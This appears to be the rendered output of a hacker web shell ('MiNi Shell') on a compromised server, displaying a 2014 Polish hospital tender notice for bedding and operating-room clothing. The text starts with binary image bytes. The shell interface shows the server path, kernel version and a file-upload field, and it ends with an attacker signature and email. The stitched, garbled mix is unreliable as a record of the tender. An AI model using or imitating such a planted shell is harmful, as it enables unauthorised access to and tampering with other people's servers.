JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140523/111247-N-2014.html

<p class="kh_header"><b>Tarnowskie Góry: SUKCESYWNE ZAKUPY BIELIZNY SZPITALNEJ I UBRAŃ OPERACYJNYCH</b><br>
<b>Numer ogłoszenia: 111247 - 2014; data zamieszczenia: 23.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE ZAKUPY BIELIZNY SZPITALNEJ I UBRAŃ OPERACYJNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje sukcesywne zakupy bielizny szpitalnej i ubrań operacyjnych, pogrupowane w 4 (cztery) pakiety traktowane jako zadania  częściowe:
    Pakiet Nr 1      Bielizna pościelowa biała;
    Pakiet Nr 2      Ubrania operacyjne dla Bloku Operacyjnego - kolor czerwony;
    Pakiet Nr 3      Ubrania operacyjne dla sal zabiegowych okulistyki, otolaryngologii
                            i endoskopii   urologicznej - kolor zielony;
    Pakiet Nr 4      Ubrania operacyjne dla OAiIT - kolor niebieski
2. Szczegółowy opis przedmiotu zamówienia - asortyment i ilość- zawarte są w załączniku [D] SIWZ  Formularz cenowy.
3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
4. Wykonawca gwarantuje, że przedmiot i warunki realizacji zamówienia w  całym okresie wykonywania umowy będą posiadać aktualne świadectwa deklaracji zgodności z wymaganiami zasadniczymi, wystawionej zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U Nr 107, poz. 679),  deklaracje  zgodności z normami    ENV 14237:2002 i EN-PN 13795
5. Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
6. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno in plus jak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- deklarację zgodności z wymaganiami zasadniczymi, wystawionej zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr 107, poz. 679) 
-  karta charakterystyki tkaniny; karta charakterystyki musi zawierać nazwę tkaniny i opis parametrów;
- deklaracja  zgodności z normą ENV 14237:2002 - Tekstylia w ochronie zdrowia 
- badania tkaniny dotyczące spełniania normy EN-PN 13795 
-   oświadczenie według załącznika [C] do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E] stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.  Strony dopuszczają zmiany umowy w zakresie:
    a)  zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
    b)  zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny.          
3. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową  
    odpowiednikiem w przypadku:
    a)  zaprzestania wytwarzania produktu objętego umową,
    b)  wygaśnięcia świadectwa rejestracji,
    c)  czasowego braku dostępności produktu objętego umową.
    Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z 
   potwierdzeniem faksem) uzgodnienia. Osobą upoważnioną do uzgodnień lub do akceptacji 
   równoważnego produktu ze strony Zamawiającego jest Kierownik Apteki Szpitalnej. 
   Zmiany w tym zakresie nie wymagają aneksów do umowy.
4.  Zmiany umowy z pominięciem ust. 3 niniejszego paragrafu wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2014 godzina 10:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Bielizna pościelowa biała.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis przedmiotu zamówienia	Zamawiana ilość
1	Poszwa - kolor biały
- tkanina sanforyzowana, 55% bawełna, 45% poliester
- wymiar 160 x 200 cm
- bez guzików z zakładką 25 cm
- gramatura 120 g/m2
- temp. prania 95 st.C, 
- LOGO SZPITALA NADRUKOWANE - kolor granatowy
WIELOSPECJALISTYCZNY SZPITAL POWIATOWY SA 
TARNOWSKIE GÓRY
Wykonane w dwóch miejscach z każdej strony wg załączonego wzoru	
300 szt.
2	Poszewka - kolor biały
- tkanina sanforyzowana, 55% bawełna, 45% poliester
- wymiar 70 x 80cm
- bez guzików z zakładką 25 cm
- gramatura 120 g/m2
- temp. prania 95 st.C, nici 100% bawełna
- LOGO SZPITALA NADRUKOWANE - kolor granatowy
WIELOSPECJALISTYCZNY SZPITAL POWIATOWY SA 
TARNOWSKIE GÓRY
Wykonane w jednym miejscu wg załączonego wzoru	200 szt.

3	Poszewka - kolor biały
- tkanina sanforyzowana, 55% bawełna, 45% poliester
- wymiar 50 x 60 cm 
- bez guzików z zakładką 25 cm
- gramatura 120 g/m2
- temp. prania 95 st.C, nici 100% bawełna
- LOGO SZPITALA NADRUKOWANE - kolor granatowy
WIELOSPECJALISTYCZNY SZPITAL POWIATOWY SA 
TARNOWSKIE GÓRY
Wykonane w jednym miejscu wg załączonego wzoru	150 szt.


4	Prześcieradło - kolor biały
- tkanina, sanforyzowana, 55% bawełna, 45% poliester- wymiar 160 x 250 cm
- gramatura 120 g/m2
- temp. prania 95 st.C
- LOGO SZPITALA NADRUKOWANE - kolor granatowy
WIELOSPECJALISTYCZNY SZPITAL POWIATOWY SA 
TARNOWSKIE GÓRY
Wykonane w dwóch miejscach z każdej strony wg załączonego wzoru
W górnej węższej części prześcieradło zszyte w tzw zakładki-kapturek umożliwiający założenie na materac łóżka. Szerokość zakładki 30 cm	450 szt



5	Podkład - kolor biały
- tkanina sanforyzowana, 55% bawełna, 45% poliester
- wymiar 80 x 160 cm
- gramatura 120 g/m2
- temp. prania 95 st.C
- LOGO SZPITALA NADRUKOWANE - kolor granatowy
WIELOSPECJALISTYCZNY SZPITAL POWIATOWY SA 
TARNOWSKIE GÓRY
Wykonane w dwóch miejscach z każdej strony wg załączonego wzoru	100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Ubrania operacyjne dla Bloku Operacyjnego kolor czerwony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis przedmiotu zamówienia	Zamawiana ilość
1	Ubranie operacyjne męskie - komplet bluza i spodnie
- kolor czerwony 
- tkanina sanforyzowana, , 55% bawełna, 45% poliester
- gramatura 118 g/m2
- temp. prania 75 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz 
na spodniach w dowolnie wybranym miejscu - kolor granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : M - XXXL 	50 kpl.

2	Ubranie operacyjne damskie - komplet bluza i spodnie
- kolor czerwony
- tkanina sanforyzowana, , 55% bawełna, 45% poliester
- gramatura 118 g/m2
- temp. prania 75 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz 
na spodniach w dowolnie wybranym miejscu - kolor granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : S - XXL 	50 kpl.

3	Koszula operacyjna - kolor jasny/biały
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 109 g/m2
- temp. prania 95 st.C
- rozcięcie z przodu na zakładkę, dekolt w szpic, krótki rękaw
- troczki do wiązania z tasiemki bawełnianej - 6 szt. 
- długość za kolano
- nadrukowany motyw nazwy szpitala - kolor granatowy
wykonany w górnej części koszulki
Rozmiar S - XXXL	30 szt.
Uwaga: wycięcie w szpic winno zapewnić swobodne przełożenie głowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Ubrania operacyjne dla sal zabiegowych okulistyki , otolaryngologii i endoskopii urologicznej kolor zielony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis przedmiotu zamówienia	Zamawiana ilość
1	Ubranie operacyjne męskie - komplet bluza i spodnie
- kolor zielony
- tkanina sanforyzowana, , 55% bawełna, 45% poliester
- gramatura 118 g/m2
- temp. prania 75 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz 
na spodniach w dowolnie wybranym miejscu - kolor granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gum	15 kpl.

2	
Ubranie operacyjne damskie - komplet bluza i spodnie
- kolor zielony
- tkanina sanforyzowana, , 55% bawełna, 45% poliester
- gramatura 118 g/m2
- temp. prania 75 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz 
na spodniach w dowolnie wybranym miejscu - kolor granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : S - XXL 	25 kpl.

3	
Sukienka operacyjna - kolor zielony
- tkanina sanforyzowana, , 55% bawełna, 45% poliester
- gramatura 118 g/m2
- temp. prania 75 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce - kolor 
granatowy.
Krój: z przodu karczek, wycięcie w szpic, jedna kieszeń na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki, długość - lekko zakrywająca kolano
Rozmiar : S - XXL 	5 szt.
Uwaga: wycięcie w szpic winno zapewnić swobodne przełożenie głowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Ubrania operacyjne dla OAiIT kolor niebieski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis przedmiotu zamówienia	Zamawiana ilość	Cena jedn. netto
1	Ubranie operacyjne męskie - komplet bluza i spodnie
- kolor niebieski
- tkanina sanforyzowana, , 55% bawełna, 45% poliester
- gramatura 118 g/m2
- temp. prania 75 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz 
na spodniach w dowolnie wybranym miejscu - kolor granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : M - XXL 	5 kpl.
	
2	Ubranie operacyjne damskie - komplet bluza i spodnie
- kolor niebieski
- tkanina sanforyzowana, , 55% bawełna, 45% poliester
- gramatura 118 g/m2
- temp. prania 75 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz 
na spodniach w dowolnie wybranym miejscu - kolor granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : S - XXL 	40 kpl.
Uwaga: wycięcie w szpic winno zapewnić swobodne przełożenie głowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com